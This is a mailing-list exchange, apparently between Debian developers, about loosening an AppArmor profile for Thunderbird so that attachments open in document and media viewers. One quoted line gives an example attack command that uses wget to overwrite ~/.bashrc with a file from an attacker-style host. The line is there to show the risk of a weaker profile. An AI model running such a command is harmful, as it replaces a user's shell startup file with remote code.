Vincas Dargis: > On 2017.10.25 10:26, intrigeri wrote: >> Indeed, it might be that the specific rules about evince & totem >> you're quoting from my patch above are not needed. It would be nice if >> we could drop them (and the maintenance cost of hard-coding a list of >> exceptions) so I'm hoping your testing confirms your hypothesis :)
> Yes I am going to test multiple format attachements just now. Amazing! :) > Personally, I would like to have bunch of abstractions to contain > all image, document viewers, editors and what not, […] I'm not looking forward to maintaining these abstractions. > With pending patch, some Thunderbird exploit needs just execute > `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end game. Right. Sadly, the other currently available option is what we have now: breaking critical stuff in a way that encourages people to fully disable AppArmor and open a bunch of other holes in their system (by disabling all confinement for all other apps). This is exactly what I've been trying to avoid in the last years while working on AppArmor in Debian, and I'm sad we're shipping an AppArmor profile that breaks basic functionality here. > But let's fix this critical broken stuff and do the right way later. ACK, glad we're on the same page :) [Now, if we want to talk about the right way, I doubt it'll be with AppArmor: Flatpak and friends finally tackle the problems AppArmor can't solve for GUI apps.] Cheers, -- intrigeri
